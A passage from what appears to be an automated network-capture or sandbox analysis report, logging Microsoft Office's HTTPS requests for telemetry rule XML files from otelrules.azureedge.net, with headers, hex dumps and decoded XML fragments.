                                                                                                                                                                                                                                                                                      117192.168.2.64985013.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:31 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:31 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:31 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1354
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 7ca1e40b-601e-003d-2f8c-3a6f25000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095431Z-185f5d8b95c96jn4hC1NYCbgp80000000a0g00000000c5nz
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:31 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      118192.168.2.64985113.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:31 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:31 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:31 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1403
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 62f37542-501e-0016-6f8c-3a181b000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095431Z-185f5d8b95ckwnflhC1NYCx9qs0000000a3g000000008z0k
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:31 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      119192.168.2.64985213.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:31 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:31 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:31 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1366
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 5a5a14b6-c01e-0079-438c-3ae51a000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095431Z-185f5d8b95c5lcmhhC1NYCsnsw0000000a6g0000000035dv
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:31 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      120192.168.2.64985413.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:32 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:32 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:32 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1399
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 5c785bae-401e-0083-638c-3a075c000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095432Z-185f5d8b95c4vwv8hC1NYCy4v40000000a3g00000000fk7g
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:32 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      121192.168.2.64985613.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:32 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:32 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:32 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1403
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                                                                                                                      x-ms-request-id: f909f157-c01e-0049-018c-3aac27000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095432Z-1777c6cb754g9zd5hC1TEBfvpw00000009fg00000000drbd
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:32 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      122192.168.2.64985513.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:32 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:32 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:32 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1362
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDF497570"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 538caadb-101e-0028-028c-3a8f64000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095432Z-r1d97b995778dpcthC1TEB4b5400000008ng000000003xk6
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:32 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      123192.168.2.64985713.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:32 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:32 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:32 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1366
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                                                                                                                      x-ms-request-id: fc6be6d3-301e-0033-058c-3afa9c000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095432Z-r1d97b99577sdxndhC1TEBec5n00000008wg0000000028wx
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:32 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      124192.168.2.64985813.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:32 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:32 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:32 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1399
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 21476416-401e-00a3-1c88-3a8b09000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095432Z-r1d97b99577hc74hhC1TEBvbns00000008m0000000004efp
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:32 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      125192.168.2.64985913.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:32 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:33 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:32 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1362
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 8222e379-801e-008f-078c-3a2c5d000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095432Z-185f5d8b95c9mqtvhC1NYCghtc0000000a3g0000000099pa
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
